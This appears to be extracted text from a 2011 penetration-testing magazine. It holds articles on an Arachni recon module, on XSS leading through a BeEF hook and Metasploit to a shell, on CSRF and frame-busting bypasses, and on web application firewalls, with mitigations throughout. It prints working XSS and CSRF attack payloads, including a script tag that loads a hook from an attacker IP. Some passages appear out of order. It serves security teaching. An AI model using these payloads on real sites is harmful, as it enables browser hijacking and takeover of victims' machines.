            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed or
                    confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory. We will create our Ruby module there.
Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in further scans) as well as create a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports, it's sufficient to just show a small alert popup: this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article, we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS – BeEF – Metasploit Exploitation
Figure 2 BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1 User enters input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a Zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box popping up on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters a simple piece of JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What the attacker will see
Figure 5 What the victim will see
Figure 6 Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7 Detecting plugins on the user's browser
Figure 8 Starting Metasploit
Figure 9 The "jobs" command
Figure 10 Metasploit after clicking "Send Now"
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
Now, first ensure that the Zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output must be encoded before displaying it to the user. The OWASP XSS prevention cheat sheet is a good guide for the same.
• White list and black list filtering can also be used to completely disallow specific characters in user input fields.
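As a minimal illustration of the encoding step, here is a sketch in Ruby (the same idea applies to encoder functions in PHP, Java, etc.): HTML-encoding the reflected value means the browser renders it as text instead of executing it. The payload string is the proof-of-concept one used earlier in the article:

```ruby
require 'cgi'

# The classic proof-of-concept payload from earlier in the article.
user_input = "<script>alert(document.domain)</script>"

# HTML-encode before reflecting the value back into the page: the
# angle brackets become entities, so no script element is ever parsed.
safe_output = CGI.escapeHTML(user_input)
puts safe_output
# => &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

Applied to the vulnerable search1.php shown earlier, the equivalent fix would be to pass the search parameter through the platform's HTML encoder before echoing it.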
Conclusion
In a nutshell, we can conclude that even a single parameter vulnerable to XSS can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvind.doraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:

• Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1. HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
       www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way to secure a web application is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to compare them after the page form submission.
Mechanisms used to subvert one-time tokens usually rely on brute force attacks. Brute forcing attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
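The PHP snippet above derives the token from rand() and uniqid(), which are not cryptographically strong sources. As a hedged sketch (the variable names and the plain Hash standing in for a session store are my own, not from the article), the same one-time token scheme can be expressed in Ruby with a cryptographically secure generator:

```ruby
require 'securerandom'

# A plain Hash stands in for the server-side session store.
session = {}

# Generate a 128-bit token from a cryptographically secure source
# and remember it server-side, like $_SESSION['token'] above.
token = SecureRandom.hex(16)   # 32 hex characters
session[:token] = token

# On form submission, accept the request only if the posted token
# matches the stored one (the comparison done by post.php in Listing 3).
posted_token = token           # simulate a legitimate submission
puts session[:token] == posted_token ? "Message stored" : "Bad request"
```

Because the token is unpredictable, a forged cross-site request cannot supply a matching value without first reading it out of the victim's page, which the same origin policy forbids.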
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>

This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of, and more powerful, applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or are simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries.
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
WEB APPLICATION CHECKING
http://pentestmag.com – 01/2011 (1) November
In the early years of the web, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how good their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. Attackers gain access to the browser via infected web applications, and through it to further systems and to the sensitive data of their owners or users.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
Thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies have in the meantime protected their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies, particularly in the first years of web usage.
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
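Of these, SQL Injection remains the canonical example: it works whenever user input is concatenated into a query string. A minimal sqlite3 sketch contrasting the vulnerable pattern with a parameterized query (the table and data are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2')")

payload = "x' OR '1'='1"  # classic injection input

# Vulnerable: input concatenated into the SQL string; the payload
# rewrites the WHERE clause and returns every row
leaked = conn.execute(
    "SELECT secret FROM users WHERE name = '" + payload + "'").fetchall()

# Safe: a parameterized query treats the payload as a literal value
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (payload,)).fetchall()

print(len(leaked), len(safe))  # prints: 2 0
```

The same principle, binding data instead of splicing strings, applies to every injection variant in the list above.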
The only more recent trend: attackers have recently started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that rely solely on the session attributes for authentication. In such cases it is not straightforward to renew the session ID after login, which makes the application susceptible to Session Fixation.
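The Session Fixation risk mentioned above is countered by issuing a fresh session ID the moment a user authenticates. A minimal framework-independent sketch (the in-memory store and function names are illustrative, not from the article):

```python
import secrets

# Hypothetical in-memory session store: session_id -> session data
sessions = {}

def create_session():
    """Issue an anonymous (pre-login) session."""
    sid = secrets.token_hex(16)
    sessions[sid] = {"user": None}
    return sid

def login(old_sid, user):
    """On successful login, discard the old session ID and issue a new one.
    This invalidates any ID an attacker may have planted (session fixation)."""
    data = sessions.pop(old_sid, {})  # the old ID becomes unusable
    new_sid = secrets.token_hex(16)
    data["user"] = user
    sessions[new_sid] = data
    return new_sid

anon = create_session()
authed = login(anon, "alice")
print(anon != authed, anon in sessions)  # prints: True False
```

An application without such a central session interface has to be restructured before this fix can even be applied, which is exactly the retrofitting cost the text describes.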
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program has ever gone into productive operation free of errors or weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast to classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. In an analogy to air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably reduces the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
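Why filtering quotes does not stop every SQL Injection can be shown with a quoteless payload: a numeric injection such as 1 OR 1=1 contains no inverted commas at all, so a quote-stripping rule passes it straight through. A small sketch (the filter is a deliberately naive stand-in, not a real WAF rule):

```python
def naive_quote_filter(value):
    """Naive WAF-style rule: strip inverted commas from the input."""
    return value.replace("'", "").replace('"', "")

def build_query(user_id):
    # Vulnerable pattern: the value is concatenated into the SQL string
    return "SELECT * FROM users WHERE id = " + user_id

# A quoted payload is (partially) defused by the filter...
quoted = naive_quote_filter("1' OR '1'='1")
# ...but a numeric payload needs no quotes and passes untouched:
numeric = naive_quote_filter("1 OR 1=1")

print(build_query(numeric))  # still a working injection
```

This is exactly why a WAF rule set has to be derived from an analysis of the application rather than from generic character filters.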
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements towards the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. In the same way, the length and the contents of parameters can be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
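A rule of the kind just described (parameter count, length, permitted characters) can be sketched as a simple validator; the field names and limits are illustrative, not from any particular product:

```python
import re

# Illustrative rule set for one monitored entry form:
# expected parameters, maximum length, and permitted characters for each
FORM_RULES = {
    "username": {"max_len": 32, "pattern": re.compile(r"^[A-Za-z0-9_]+$")},
    "age":      {"max_len": 3,  "pattern": re.compile(r"^[0-9]+$")},
}

def check_request(params):
    """Block requests with unexpected, overlong or malformed parameters."""
    if set(params) != set(FORM_RULES):   # wrong number or names of parameters
        return False
    for name, value in params.items():
        rule = FORM_RULES[name]
        if len(value) > rule["max_len"]:
            return False
        if not rule["pattern"].match(value):
            return False
    return True

print(check_request({"username": "alice", "age": "30"}))            # True
print(check_request({"username": "alice", "age": "30", "x": "1"}))  # False: extra parameter
print(check_request({"username": "a' OR 1=1 --", "age": "30"}))     # False: invalid characters
```

Even this small rule set already rejects parameter tampering and the quoted injection payloads discussed earlier.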
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for request rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works.
